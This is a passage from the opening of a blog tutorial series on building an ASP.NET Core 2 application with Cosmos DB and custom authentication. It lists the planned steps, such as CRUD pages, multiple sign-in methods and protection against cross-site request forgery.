or not. Created attachment 419530 [details] [diff] [review] address review comments pushed. this fixes this bug well enough to close it out, will do rest of subpixel work in another bug. this looks a lot better with the 20091230 builds on my n810 and n900.
https://bugzilla.mozilla.org/show_bug.cgi?id=470440
CC-MAIN-2017-34
refinedweb
1,290
64.91
First off, if you haven’t seen it, check out what you can do with SerialUI and then download it! Once you have SerialUI installed (see the included INSTALL.txt file), the best thing is to look into the example included with the code (in examples/SuperBlinker) but here we’ll go over the key points. The following assumes your are developing for Arduino, adjust as required. Include The first thing you need is to include the SerialUI functionality. Easy enough: #include <SerialUI.h> Strings We are going to need some strings, to let the user know what’s going on. To avoid taking up a ton of space in RAM, just about every SerialUI string is stored in the flash memory and used directly from there (in progmem). There’s a little macro that makes declaring these strings easy: SUI_DeclareString(var_name, “string contents”). Just add as many as you need for your interface. You’ll want strings for “keys” (the menu item names) and probably for help messages, too. Let’s say we want a simple menu like: - information - enable - on - off Then we would have this in our code: // the strings we'll use SUI_DeclareString(device_greeting, "+++ Welcome to the MyDevice +++\r\nEnter ? for help."); SUI_DeclareString(top_menu_title, "MyDevice Main Menu"); SUI_DeclareString(info_key,"information"); SUI_DeclareString(info_help, "Retrieve data and current settings"); SUI_DeclareString(enable_key, "enable"); SUI_DeclareString(enable_help, "Enable/disable device"); SUI_DeclareString(enable_on_key,"on"); SUI_DeclareString(enable_off_key,"off"); Now we have some usable strings for our serial user interface. SerialUI Instance Next, we need an actual SerialUI object to play with. Simply create it, passing in the greeting message as a parameter to set things up easily: // our global-scope SerialUI object SUI::SerialUI mySUI = SUI::SerialUI(device_greeting); Callbacks We want our UI to me more than pretty menus: we want it to actually do something. For this, we’ll be associating a callback to every command. These callbacks are just functions which return “void” and take no parameters. What they do is up to you. Here, we’ll have 3 commands: information and enable->on/off. So we create 3 callbacks: /* *********** Callbacks ************ */ void show_info() { /* we will output some information. To send data to the user, always use the SerialUI object (using it in exactly the same way as the normal Arduino Serial): */ mySUI.print("Hello... "); mySUI.println("This is all my info!"); } void turn_on() { /* here we'd turn the device "on" (whatever that means) for now, we just: */ mySUI.println("ON"); } void turn_off() { // same as above, but for "off" mySUI.println("OFF"); } You can do anything you like in the callbacks, including request and read user input (see showEnterDataPrompt() in the advanced usage page). Setup We’ve got our strings and callbacks, time to setup SerialUI and create our menu structure. If you’re on an Arduino, the setup() function is called automatically at the start of the program. void setup() { // Remember: SerialUI acts just like Serial, // so we need to mySUI.begin(115200); // serial line open/setup /* there are other settings available, for input timeouts, EOL char and such--SEE the example code! With the config above, set your Serial Monitor to 115200 baud and "Newline" line endings. Now for the menus (skipping error-checking for simplicity's sake, but it's all in the example) Get a handle to the top level menu Menus are returned as pointers. */ SUI::Menu * mainMenu = mySUI.topLevelMenu(); // Give the top-level menu a decent name mainMenu->setName(top_menu_title); /* we add commands using... addCommand() passing it the key, callback and optionally help string */ mainMenu->addCommand(info_key, show_info, info_help); /* we create sub-menus using... subMenu() passing the key and optionally a help string */ SUI::Menu * enableMenu = mainMenu->subMenu(enable_key, enable_help); /* now we have our sub-menu. Give it some commands, too. */ enableMenu->addCommand(enable_on_key, turn_on); enableMenu->addCommand(enable_off_key, turn_off); // We are done, yay! } Main Loop The final step is handling serial user requests in the main loop. This is done by checking for the presence of a user, and calling handleRequests() until they are gone. For Arduino, the loop function is the aptly-named loop(): void loop() { /* We checkForUser() periodically, to see if anyone is attempting to send us some data through the serial port. This code checks all the time, for 150 ms, upon entering the loop. In cases where you you would like to check only the first time around, use checkForUserOnce(), with a larger timeout, e.g. mySUI.checkForUserOnce(15000); */ // check for a user if (mySUI.checkForUser(150)) { // we have a user initiating contact, show the // greeting message and prompt mySUI.enter(); // keep handling the serial user's // requests until they exit or timeout. while (mySUI.userPresent()) { // actually respond to requests, using mySUI.handleRequests(); } } // end if we had a user on the serial line // below this block, you can do whatever // SerialUI-unrelated stuff you need to do. } And that’s it! SerialUI will now handle connections, navigation and command calls, providing online help as requested. Building this for the Uno, the program compiles to about 7k (a revised version that builds smaller is in the works). If you want to avoid the cut&pasting, download this example source and go from there–but, really, you’d be better off looking into the full example (in Examples -> SerialUI -> SuperBlinker, in the Arduino IDE once the library is installed.) For more information, about the SerialUI API and customized compilation directives, see the SerialUI Advanced Usage page. All SerialUI pages:
https://flyingcarsandstuff.com/projects/serialui/using-serialui/
CC-MAIN-2017-51
refinedweb
905
55.74
Okay so here's the assignment: Problem Statement You have been commissioned by the US Navy to develop a system for tracking the amount of fuel consumed by fleets of ships. Each ship has a name (ex: "Carrier"), fuel capacity (the maximum amount of fuel the ship can carry), and amount of fuel currently onboard. In this problem, fuel is measured in "units" and the capacity of each ship is an integer number (ex: The carrier's capacity is 125 fuel units). Each fleet has exactly four ships in it. When a fleet is deployed, each ship in the fleet is deployed. When a ship is deployed, it consumes half of the fuel it has onboard. When a fleet is refueled, each ship in the fleet is refueled. When a ship is refueled, it is totally filled up (its onboard amount equals its capacity). Assignment Your Fleet class need 4 methods: A constructor that takes 4 Ships as parameters. A method called deploy that will deploy each ship in the fleet. A method called refuel that will refuel each ship in the fleet. A method called printSummary that will print, for each ship, the ship's name and the number of fuel units that ship has consumed. From reviewing the Driver, you can see that you will need a Ship class as well. The constructor of this class will take the ship's name and fuel capacity as parameters. Infer from the Problem Statement what instance variable and methods you need in the Ship class. Alright so what I have done so far: public class Ship { private String name; private int fuelCapacity; private int fuelOnboard; /** * Constructor for objects of class ship */ public Ship(String inName, int inFuelCapacity) { name = inName; fuelCapacity = inFuelCapacity; } public int refuled() { fuelOnboard = fuelCapacity; } public int deploy() { fuelOnboard = fuelOnboard/2; } public String getName() { return name; } public int getFuelCapacity() { return fuelCapacity; } } public class Fleet { private Ship ship1; private Ship ship2; private Ship ship3; private Ship ship4; /** * Constructor for objects of class Fleet */ public Fleet(Ship inShip1, Ship inShip2, Ship inShip3, Ship inShip4) { ship1 = inShip1; ship2 = inShip2; ship3 = inShip3; ship4 = inShip4; } public void deploy () { } public void reFuel() { } public void printSummary() { } } and the Driver (which was provided): /** * Driver for Outlab2. * * @author yaw * @version 22 Jan 2014 */ public class Driver { public static void main(String[] args) { //Creating 4 instances of Ship Ship ship1 = new Ship("Carrier", 150); Ship ship2 = new Ship("Anti-Submarine", 35); Ship ship3 = new Ship("Patrol", 22); Ship ship4 = new Ship("Destroyer", 83); //Creating instance of Fleet Fleet fleet1 = new Fleet(ship1, ship2, ship3, ship4); //Deploying the fleet twice fleet1.deploy(); fleet1.deploy(); //Refuel the fleet once fleet1.reFuel(); //Print summary fleet1.printSummary(); } } As you can see I am having trouble with communicating between my Fleet class and my Ship class. Even if I am able to use my deploy method in my Ship class I would still be wondering how to use it on all the ships at once. Also, as you can see I made ship1, ship2... so forth of type Ship and I wasn't sure if this was correct or not. Not sure if my Ship class is correct either. The reason I say that is when I look at the driver. The driver makes me think I should only have two return statements in my Ship class while the deploy method from Ship seems like it should be in Fleet. But the problem statement clearly states in my opinion that Ship should have a deploy and refuel method along with Fleet. I just need some of your guy's advice on how to interpret the problem statement correctly. Is my ship class correct? If so, then what am I missing about calling the Ship method from the Fleet class? --- Update --- Will simply calling all four of them work like: ship1.deploy(); ship2.deploy(); ship3.deploy(); ship4.deploy();
http://www.javaprogrammingforums.com/whats-wrong-my-code/35686-having-trouble-communicating-between-methods-need-assistance.html
CC-MAIN-2015-18
refinedweb
643
68.1
I'm moving on to other ideas of racing with Ringos and thought I should post my line following code. This I'm confident is robust to work. There is room for tweaking speed for your own tracks and find your own improvements. Hope this help someone out there, I'm just learning like many of you. Code: Select all /* sil-line_follow_03 Line Follow by Steve Bolton if you base your code on mine please leave my name in place and share on the plumgeek forum for others to learn from. A simple but robust line follow code runs well on an oval circuit using black electricians tape on a white topped desk. Its meant to run on a surface straddling a line made of black tape though it can work with a 15mm line of black paint. it runs straight but if it drifts the eyes detect the line and it readjusts. Work best on a 50cm wide circular track, hard corners are a problem */ #include "RingoHardware.h" /* set up hardware */ void setup(){ HardwareBegin(); //initialize Ringo's brain to work with his circuitry PlayStartChirp(); //Play startup chirp and blink eyes SwitchMotorsToSerial(); //Call "SwitchMotorsToSerial()" before using Serial.print functions as motors & serial share a line SwitchButtonToPixels(); RestartTimer(); delay(2000); // 2 sec delay before start } /* declare variables */ int leftOn, leftOff, rightOn, rightOff, rearOn, rearOff; int leftDiff,rightDiff, rearDiff; int speedleft, speedright; void loop(){ digitalWrite(Source_Select, LOW); //select underside light sensors digitalWrite(Edge_Lights, HIGH); //turn on IR light sources delayMicroseconds(500); //let sensors stabilise leftOn = analogRead(LightSense_Left); rightOn = analogRead(LightSense_Right); rearOn = analogRead(LightSense_Rear); SetAllPixelsRGB(0, 0, 0); //all lights off //set default speed of 50 speedleft = 50; speedright = 50; Motors(speedleft, speedright); // use Motors() to turn using multiplier if (leftOn < 250) { SetPixelRGB( 5, 0, 50, 0); Motors(speedleft, speedright*3); } if (rightOn < 250) { SetPixelRGB( 4, 0, 50, 0); Motors(speedleft*3, speedright); } if (rearOn < 250) { SetPixelRGB( 0, 0, 50, 0); } }
http://forum.plumgeek.com/viewtopic.php?f=10&t=724&sid=c6049a57f393a8b0f678caf2860d887d
CC-MAIN-2018-17
refinedweb
318
52.53
NAME¶ set - Read and write variables SYNOPSIS¶ set varName ?value? DESCRIPTION¶ Returns the value of variable varName. If value is specified, then set the value of varName to value, creating a new variable if one does not already exist, and return its value. If varName contains an open parenthesis and ends with a close parenthesis, then it refers to an array element: the characters before the first open parenthesis are the name of the array, and the characters between the parentheses are the index within the array. Otherwise varName refers to a scalar variable. If. EXAMPLES¶ Store a random number in the variable r:] SEE ALSO¶ expr(3tcl), global(3tcl), namespace(3tcl), proc(3tcl), trace(3tcl), unset(3tcl), upvar(3tcl), variable(3tcl) KEYWORDS¶ read, write, variable
https://manpages.debian.org/testing/tcl8.6-doc/set.3tcl.en.html
CC-MAIN-2022-05
refinedweb
126
51.48
A command is the path to a file, optionally followed by a variable number of arguments and input and output redirection. The entire command is optionally followed by an ampersand. The path, arguments and file name will not contain the '&', ';', '|', '>', or '<' characters. Input and output redirection may appear before, after or inbetween arguments. For example, the following are all valid and equivalent: A list of commands is a sequence of commands separated by semicolons. There may be several semicolons separating two commands. A line is either empty, or any number of lists of commands separated by at most one '|'. Lines are terminated by newline characters. prompt> /bin/ls shell.c prompt> /bin/ls ; /bin/ls shell.c shell.c prompt> /bin/ls ; /bin/ls ; /bin/ls shell.c shell.c shell.c prompt> prompt> /bin/ls < Missing name for redirect. prompt> /bin/ls > Missing name for redirect. prompt> prompt> /bin/ls < nonexistant nonexistant: No such file or directory prompt> prompt> /bin/ls newfile /bin/ls: newfile: No such file or directory prompt> /bin/ls > newfile prompt> /bin/cat newfile shell.c prompt> prompt> /bin/ls > shell.c shell.c: File exists prompt> For the above you should use the open system call, look at the various arguments it takes. prompt> /bin/ls < shell.c < shell.c Ambiguous input redirect. prompt> Pipes are the oldest form of UNIX interprocess communication (IPC). They are half-duplex, data only flows in one direction. The pipe system call takes an array of two integers, it puts the file descriptor for reading from the pipe in the first element and the file descriptor for writing to the pipe in the second. Pipes are not useful within a single process, but if a process forks a child (or children) after creating a pipe then both processes have copies of the pipe file descriptors. The process producing data process closes the 1st file descriptor and writes to the 2nd file descriptor. The consuming process closes the 2nd file second file descriptor and reads from the 1st file descriptor. This code illustrates how your shell could set up a pipe between the two processes in the command "ls | grep foo". Make sure you understand what it does. The program pnums takes a single argument n and prints the numbers 0 to n-1 on separate lines. The program clines counts the number of lines of input it receives and prints this information. In the following example the output of pnums is piped to clines. prompt> /u/e/l/eli/537/p1/pnums 3 0 1 2 prompt> /u/e/l/eli/537/p1/pnums 3 | /u/e/l/eli/537/p1/clines 3 lines prompt> prompt> /u/e/l/eli/537/p1/pnums 3 | /u/e/l/eli/537/p1/clines > /u/e/l/eli/537/p1/newfile prompt> /bin/cat /u/e/l/eli/537/p1/newfile 3 lines prompt> A process can not receive input from both a pipe AND from input redirection. A process can not output to both a pipe and have its output redirected to a file. You do not have to print the following errors for the following examples but your code should not segfault on them (we will not assume that part of the command executes succesfully). prompt> /u/e/l/eli/537/p1/pnums 5 | /u/e/l/eli/537/p1/clines < /u/e/l/eli/537/p1/some_file Ambiguous input redirect. prompt> /u/e/l/eli/537/p1/pnums 5 > /u/e/l/eli/537/p1/newfile | /u/e/l/eli/537/p1/clines Ambiguous output redirect. prompt> For part 2, when your shell exits (either with Ctrl-d or with the "exit" command) you should not wait for all children to exit before your shell exits. A command that is executed in the background should not be immediately waited on by the shell. But eventually this process must be waited on because after it exits it will stick around until its parent waits on it (it sticks around so that its return code is available). When a process exits its parent is sent the SIGCHLD signal. A signal is like a software interrupt. Signals are received asynchronously (we do not know when the child will die). To handle this you need to setup a signal handler for SIGCHILD so that processes that exit can be waited on (if you do not wait on them they show up as "defunct" in the ps command's output). The following illustrates what code you need to add. #include <signal.h> void handle_sigchld(int s) { /* execute non-blocking waitpid, loop because we may only receive * a single signal if multiple processes exit around the same time. */ while (waitpid(0, NULL, WNOHANG) > 0); } int main() { ... /* register the handler */ signal(SIGCHLD, handle_sigchld); ... } prompt> /u/e/l/eli/537/p1/endless | /u/e/l/eli/537/p1/clines & prompt> /bin/ps PID TTY TIME CMD 5799 pts/2 00:00:00 tcsh 6050 pts/2 00:00:00 shell 6051 pts/2 00:00:03 endless 6052 pts/2 00:00:00 clines 6053 pts/2 00:00:00 ps prompt> prompt> /u/e/l/eli/537/p1/endless ; /u/e/l/eli/537/p1/endless & ... ... ... prompt> /u/e/l/eli/537/p1/endless & ; /u/e/l/eli/537/p1/endless & prompt> /bin/ps PID TTY TIME CMD 8899 pts/0 00:00:00 tcsh 9841 pts/0 00:00:00 shell 9842 pts/0 00:00:19 endless 9843 pts/0 00:00:19 endless 9847 pts/0 00:00:00 ps prompt> Come up with a high-level algorithm for parsing the command line. As with any assignment, think about the problem before you start diving into code. For example, do you want to go through each token sequentially, or make several passes over the string with different delimiters each time? You might find strtok_r useful for this. Your life will be easier, and your code will be much cleaner, if you use data structures and functions to modularize your code. If you are not familiar with structs, memory allocation (or other C basics) get a copy of "The C Programming Language" or use the online tutorials. If you need practice, trying doing some simple exercises like implementing a linked list. If you (1) check the return values of all library and system calls for errors, and (2) check pointer values for NULL before using them you will find the source of many bugs. Use default values. For example, if you create an array it will initially contain junk values. If you initially set all array elements to NULL, then later observe junk values you know these values are due to a bug in your program. If you are getting a segfault -- look at one of the gdb tutorials to see how to debug your program. Here's the transcript of a shell session using gdb to see which line in a program caused the segfault. The program should be compiled with the -g flag, this is so gcc will include debug information (like line numbers) in the binary.
http://pages.cs.wisc.edu/~eli/537/p1/part2.html
crawl-003
refinedweb
1,186
71.44
The opinions expressed in these materials are my own and are not necessarily those of Microsoft. Copyright © Microsoft Corporation. All rights reserved. Unless otherwise indicated, all source code provided is licensed under the Microsoft Public License (Ms... Menu: Tools -> Options -> Text Editor -> All Languages -> General -> DisplayVersions: 2008,2010Published: 3/7/2010Code: vstipEdit0025 Line numbers are not on by default. To turn on line numbers just go to Tools -> Options -> Text Editor -> All Languages -> General -> Display and check Line numbers: Keyboard: CTRL + K, CTRL + C (comment); CTRL + K, CTRL + U (uncomment)Menu: Edit -> Advanced -> Comment Selection; Edit -> Advanced -> Uncomment SelectionCommand: Edit.CommentSelection; Edit.UncommentSelectionVersions: 2008,2010Published: 4/13/2010Code: vstipEdit0047 Download the seriously cool Tip of the Day Extension to get the daily tips delivered to your Start Page! Sometimes it's the simple stuff we forget about. So I present to you the classic Comment and Uncomment Selection. Naturally, you have the Comment and Uncomment buttons: And, of course, we have the Menu items: But it's the keyboard shortcuts that really rock! These will, predictably, comment or uncomment lines of code for you. So, let's say you have some code you want commented out. Just select it: Then press CTRL + K, CTRL + C (in this example): Voila! It's commented out. Okay, great, but what if you don't want to use the mouse? No problem! Just hold ALT + SHIFT + [UP or DOWN ARROW] to do a vertical selection (NOTE: In VS2008 you have to go right or left one character before you can go up or down for vertical selection): Then press CTRL + K, CTRL + U (in this example): And there you go! Comment and Uncomment actions anytime you want! The: I at: NOTE: There is an async version of his code that he does as a follow up. I don't use it because I want to remove extra code noise to focus on the act of calling the script itself. If you want to take a stab at the async version (and there are LOTS of good reasons to do so) then you can go here: So, on to the goodness! First, you need to make sure you have Visual Studio (any version) installed and have PowerShell installed. You can get PowerShell from here: You will also need to do this (WARNING: MAJOR SECURITY ISSUE HERE AND THIS IS JUST FOR TESTING SO DON'T DO THIS ON PRODUCTION MACHINES): 1. Now, let's crank out a simple PoweShell script that we are interested in calling. We will call a simple script that takes a couple of numbers and returns the sum of those numbers. This may seem overly simplistic but it is an easy way to demonstrate a complete round-trip between our app and the script without getting bogged down in extra BS that comes with a fancier script. I'll call the script AddItUp.ps1 and it is included in the source code download, just put it anywhere you can get to easily. Feel free to dig into the guts of it later on but for now just assume it does what we need it to do. Here is the code for the script if you just want to make your own real quick: # begin function AddStuff($x,$y) { $x + $y } AddStuff 6 5 # end NOTE: Some inspiration and just a cool site for scripts came from just as an fyi 2. Test the script by opening PowerShell and navigating to the directory where it is and typing what you see in the graphic, you should get the expected result. 3. Okay! We have a script that works but now what? Well we have to call that puppy from our code so let's create a project and get ready to make our magic happen. Crank out a new Windows App for us to use. Call the Project CallMeCS or CallMeVB depending on your language. 4. For the interface, just gimme a button and a label. Resize the form a bit so we don't have wasted space. Real simple stuff... 5. Double-click on the button to go into our code. C#: VB: 6. Now we need to add an assembly that is one of a set we got with our install of PowerShell. You can find these assemblies at C:\Program Files\Reference Assemblies\Microsoft\WindowsPowerShell\v1.0 7. Right-click on your project and choose Add Reference... 8. Select the Browse Tab and locate these assemblies then add a reference to the System.Management.Automation.dll NOTE: If you want to dig deeper into the contents of this namespace, you can check it out here: 9. Now that we have our reference we need to add some using/imports statements to make getting to the classes we want to use easier. Make sure to put these at the top of your code page outside any other code. using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.IO; Imports System.Collections.ObjectModel Imports System.Management.Automation Imports System.Management.Automation.Runspaces Imports System.Text Imports System.IO 10. Okay, this next part is a little funkier. While I liked the code that Mikkers had, I wanted to be able to load up a file from my file system and use it instead of just putting code into a textbox. That created some VERY interesting new challenges but the end result worked out well. So, to that end, we will create two helper methods: RunScript and LoadScript. RunScript is the code essentially unchanged from Mikkers' article and LoadScript is my helper function that will load the contents of a script file and return a string. 11. Let's begin with the RunScript method. We will add this method to the Form1 class to make our life easier. the results of the script that has // now been converted to text return stringBuilder.ToString(); } ' Takes script text as input and runs it, then converts ' the results to a string to return to the user Private Function RunScript(ByVal scriptText As String) As String ' create Powershell runspace Dim MyRunSpace As Runspace = RunspaceFactory.CreateRunspace() ' open it MyRunSpace.Open() ' create a pipeline and feed it the script text Dim MyPipeline As Pipeline = MyRunSpace.CreatePipeline() MyPipeline.Commands.AddScript(scriptText) ' add an extra command to transform the script output objects into nicely formatted strings ' remove this line to get the actual objects that the script returns. For example, the script ' "Get-Process" returns a collection of System.Diagnostics.Process instances. MyPipeline.Commands.Add("Out-String") ' execute the script Dim results As Collection(Of PSObject) = MyPipeline.Invoke() ' close the runspace MyRunSpace.Close() ' convert the script result into a single string Dim MyStringBuilder As New StringBuilder() For Each obj As PSObject In results MyStringBuilder.AppendLine(obj.ToString()) Next ' return the results of the script that has ' now been converted to text Return MyStringBuilder.ToString() End Function 12. Now we want to add in our LoadScript method to make getting the script into a variable easier. // helper method that takes your script path, loads up the script // into a variable, and passes the variable to the RunScript method // that will then execute the contents private string LoadScript(string filename) { try { // Create an instance of StreamReader to read from our file. // The using statement also closes the StreamReader. using (StreamReader sr = new StreamReader(filename)) { // use a string builder to get all our lines from the file StringBuilder fileContents = new StringBuilder(); // string to hold the current line string curLine; // loop through our file and read each line into our // stringbuilder as we go along while ((curLine = sr.ReadLine()) != null) { // read each line and MAKE SURE YOU ADD BACK THE // LINEFEED THAT IT THE ReadLine() METHOD STRIPS OFF fileContents.Append(curLine + "\n"); } // call RunScript and pass in our file contents // converted to a string return fileContents.ToString(); } } catch (Exception e) { // Let the user know what went wrong. string errorText = "The file could not be read:"; errorText += e.Message + "\n"; return errorText; } } ' helper method that takes your script path, loads up the script ' into a variable, and passes the variable to the RunScript method ' that will then execute the contents Private Function LoadScript(ByVal filename As String) As String Try ' Create an instance of StreamReader to read from our file. ' The using statement also closes the StreamReader. Dim sr As New StreamReader(filename) ' use a string builder to get all our lines from the file Dim fileContents As New StringBuilder() ' string to hold the current line Dim curLine As String = "" ' loop through our file and read each line into our ' stringbuilder as we go along Do ' read each line and MAKE SURE YOU ADD BACK THE ' LINEFEED THAT IT THE ReadLine() METHOD STRIPS OFF curLine = sr.ReadLine() fileContents.Append(curLine + vbCrLf) Loop Until curLine Is Nothing ' close our reader now that we are done sr.Close() ' call RunScript and pass in our file contents ' converted to a string Return fileContents.ToString() Catch e As Exception ' Let the user know what went wrong. Dim errorText As String = "The file could not be read:" errorText += e.Message + "\n" Return errorText End Try 13. Finally, we just need to add some code for our button's click event. private void button1_Click(object sender, EventArgs e) { // run our script and put the result into our textbox // NOTE: make sure to change the path to the correct location of your script textBox1.Text = RunScript(LoadScript(@"c:\users\zainnab\AddItUp.ps1")); } Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click 'run our script and put the result into our textbox 'NOTE: make sure to change the path to the correct location of your script TextBox1.Text = RunScript(LoadScript("c:\users\zainnab\AddItUp.ps1")) End Sub 14. That's it!! You should be able to run your code and you should get this: Don't sweat it if you think this is a lot to type. I have included the source code for you to use. Enjoy!: Menu: Tools -> Import and Export Settings Command: Tools.ImportandExportSettings Versions: 2008,2010 Published: 8/13/2010 Code: vstipEnv0034 Folks I want to get your input on the possible title for the new book. Give me your comments at Ever see a cool set of colors your friend or co-worker Computer Now that you see what you like, get them to export their Fonts and Colors. Go to Tools -> Import and Export Settings: Click Next and ONLY export the Fonts and Colors NOTHING ELSE: Click Next then give the settings a cool name and click Finish: On the Studio Styles Site Find the style you want and click on it: Pick your Visual Studio version Click on "Download this scheme" then follow the instructions in the next section. Changing Your Colors Put the settings file on a USB key or somewhere you can get to it from your computer. While you can put the file anywhere you want on your system, I prefer to put it with the other settings files located at "C:\Users\<user>\Documents\Visual Studio <version>\Settings": Now just go to Tools -> Import and Export Settings on your machine: Click Next. If you haven't backed up your settings in a while, feel free to do so. Check out vstipEnv0034 if you want more information on exporting your settings: Pick the settings file that has the color scheme you want: Click Next. Verify that the file is ONLY importing Fonts and Colors then click Finish: Danger Will Robinson That's it! You should have your new colors. If things get bad (i.e. you get funky colors and don't have a backup) and you need to get the default colors back all you have to do is go to Tools -> Options -> Fonts and Colors and click "Use Defaults". Be warned this is a nuclear option for your colors and wipes out any custom colors used: SKU: Premium, Ultimate Versions: 2008, 2010 Code: vstipTool0131 When working with code metrics, one of the least understood items seems to be cyclomatic complexity..: “The SATC has found the most effective evaluation is a combination of size and [Cyclomatic] complexity. The modules with both a high complexity and a large size tend to have the lowest reliability. Modules with low size and high complexity are also a reliability risk because they tend to be very terse code, which is difficult to change or modify.” [SATC]: There may be differences when calculating code metrics using Visual Studio 2010 that don’t apply to Visual Studio 2008. The online documentation () gives the following reasons: The bottom line is that a high complexity number means greater probability of errors with increased time to maintain and troubleshoot. Take a closer look at any functions that have a high complexity and decide if they should be refactored to make them less complex. :
http://blogs.msdn.com/b/zainnab/default.aspx?PostSortBy=MostViewed&PageIndex=1
CC-MAIN-2014-15
refinedweb
2,145
70.73
Pimpl is a common idiom in C++. It means hiding the implementation details of a class with a construct that looks like this: class pimpl; class Thing { private: pimpl *p: public: ... }; This cuts down on compilation time because you don’t have to #include all headers required for the implementation of this class. The downside is that p needs to be dynamically allocated in the constructor, which means a call to new. For often constructed objects this can be slow and lead to memory fragmentation. Getting rid of the allocation It turns out that you can get rid of the dynamic allocation with a little trickery. The basic approach is to preserve space in the parent object with, say, a char array. We can then construct the pimpl object there with placement new and delete it by calling the destructor. A header file for this kind of a class looks something like this: #ifndef PIMPLDEMO_H #define PIMPLDEMO_H #define IMPL_SIZE 24 class PimplDemo { private: char data[IMPL_SIZE]; public: PimplDemo(); ~PimplDemo(); int getNumber() const; }; #endif IMPL_SIZE is the size of the pimpl object. It needs to be manually determined. Note that the size may be different on different platforms. The corresponding implementation looks like this. #include"pimpldemo.h" #include<vector> using namespace std; class priv { public: vector<int> foo; }; #define P_DEF priv *p = reinterpret_cast<priv*>(data) #define P_CONST_DEF const priv *p = reinterpret_cast<const priv*>(data) PimplDemo::PimplDemo() { static_assert(sizeof(priv) == sizeof(data), "Pimpl array has wrong size."); P_DEF; new(p) priv; p->foo.push_back(42); // Just for show. } PimplDemo::~PimplDemo() { P_DEF; p->~priv(); } int PimplDemo::getNumber() const { P_CONST_DEF; return (int)p->foo.size(); } Here we define two macros that create a variable for accessing the pimpl. At this point we can use it just as if were defined in the traditional way. Note the static assert that checks, at compile time, that the space we have reserved for the pimpl is the same as what the pimpl actually requires. We can test that it works with a sample application. #include<cstdio> #include<vector> #include"pimpldemo.h" int main(int argc, char **argv) { PimplDemo p; printf("Should be 1: %d\n", p.getNumber()); return 0; } The output is 1 as we would expect. The program is also Valgrind clean so it works just the way we want it to. When should I use this technique? Never! Well, ok, never is probably a bit too strong. However this technique should be used very sparingly. Most of the time the new call is insignificant. The downside of this approach is that it adds complexity to the code. You also have to keep the backing array size up to date as you change the contents of the pimpl. You should only use this approach if you have an object in the hot path of your application and you really need to squeeze the last bit of efficiency out of your code. As a rough guide only about 1 of every 100 classes should ever need this. And do remember to measure the difference before and after. If there is no noticeable improvement, don’t do it.
http://voices.canonical.com/jussi.pakkanen/tag/performance/
CC-MAIN-2014-42
refinedweb
520
56.96
Version: 2.9.7 OS: Linux in yakuake 2.9.7, the keyboard shortcut ctrl-shift-+ is assigned to "increase font size", and ctrl-shift-- is assigned to "reduce font size", and i can't seem to change those shortcuts! in joe, which is my console editor of choice, ctrl-_ is the undo function... and on a german keyboard, _ is shift-- which basically means in yakuake 2.9.7 on a german keyboard there is no undo. Reproducible: Always Steps to Reproduce: set keyboard to german edit a file in joe in a yakuake terminal try to undo a change with ctrl_ Actual Results: the fontsize in yakuake decreases Expected Results: the change in joe should be undone OS: Linux (i686) release 2.6.34-12-pae Compiler: gcc This is a bug in Konsole that causes its shortcuts to be exposed in the Konsole KPart component which Yakuake embeds, when they shouldn't be. The only thing you can do is change the shortcuts in Konsole, sorry. i already thought of that and tried it. in konsole, those hotkeys are set to "NONE" for me, and still yakuake does the font thing. Then Konsole may have changed recently so it not only exposes its shortcuts in its KPart but doesn't load the settings values, so they're always the defaults. Yakuake's codebase has no functionality to change the font size in any way (the terminal area is provided by the Konsole KPart component, which has no API by which the hosting application could manipulate the terminal font anyway). What I can do is blacklist and disable the actions from the Yakuake side, I've already done that for some other actions. But this really is a Konsole bug, so I'll reassign it there. For the technical record: The actions that Konsole pollutes the hosting app's "namespace" with aren't even in the KPart's actionCollection(). SVN commit 1165837 by hein: Blacklist Konsole's font actions. CCBUG:248469 M +6 -0 terminal.cpp WebSVN link: strangely enough in konsole itself those keyboard shortcuts do not work anymore after i switched them off... so i guess its only the konsole KPART that does not read its settings properly, or sumthin like that. *** Bug 254472 has been marked as a duplicate of this bug. *** (In reply to comment #4) > SVN commit 1165837 by hein: > > Blacklist Konsole's font actions. > > CCBUG:248469 > > > M +6 -0 terminal.cpp > > > WebSVN link: The patch didn't helped being applied against yakuake-2.9.7. This bug is a real showstopper for Bash and Emacs(-like) users :-( Yeah, I can confirm that the patch doesn't work, unfortunately. *** This bug has been confirmed by popular vote. *** *** Bug 230915 has been marked as a duplicate of this bug. *** Git commit 08de49da1cf4c89c375d7eea267bce3b46c05527 by Jekyll Wu. Committed on 01/03/2012 at 01:58. Pushed by jekyllwu into branch 'master'. konsolepart should not expose actions only meaningful to Konsole Note: some actions, such as enlarging/shrinking font and setting encoding, might actually be also useful in konsolepart. But since konsolepart currently always use the default shortcut, the general idea now is to expose actions as few as possible in konsolepart. FIXED-IN: 4.9.0 REVIEW: 104034 CCMAIL: hein@kde.org M +43 -32 src/SessionController.cpp M +2 -1 src/SessionController.h I get the ambiguous action for Ctrl+Shift+W with Yukake + Konsole. This has been opened as a separate report here: In Yukake, each terminal split inside a tab seems to be a Konsole part and the tabs are managed by Yukake. Intuitively, it is expected that Ctrl+Shift+W closes a Yukake tab like in Konqueror, and this tab may contain many Konsole parts. Interestingly, ctrl-shift-t works as expected in Yukake, so the Konsole part does not expose it. Why should it expose ctrl-shift-w be exposed then, since those actions are somewhat opposite? It seems more logical not to expose ctrl-shift-w as well.
https://bugs.kde.org/show_bug.cgi?id=248469
CC-MAIN-2022-27
refinedweb
669
72.87
I’m in the writers chair, though, so this will be somewhat opinionated. We’ll be ignoring some pre-packaged solutions (like Identity, Entity Framework), shipping in small increments, and aiming for a balance between YAGNI and a clean foundation. Who is this for? If you have worked with earlier versions of ASP.Net Core and need a hand starting with Core 2, wanted to try out Cosmos DB, wondered how to create Custom Authentication without the clumsy abstraction of Identity model, worked in other ASP.Net projects but never created one on your own … I hope this will help. Bite-size pieces It would be easy to jump ahead and start coding up a solution, but I like to attack problems in bite-size pieces. Taking small, defined steps forward and locking them in provides a sense of forward momentum and provides a safer foundation when we reach the areas we’re less familiar with. I’m not 100% how far this series is going to go, but I need this foundation for a side project so at a minimum we will - Create an ASP.Net Core 2 app, without bothering with bootstrap - Put it in source control - Explore basic usage of Cosmos DB by writing some simple CRUD pages - Apply the newest iteration of ASP.Net Authentication - Expand to support multiple authentication methods - Apply better patterns for Cosmos DB setup and usage - Ensure forms are safe from Cross site request forgery - …And maybe: Solid error handling, generic error pages, basic instrumentation, API token authentication, CI/CD, unit tests, and more We will do this all without letting the standard templates steer us into 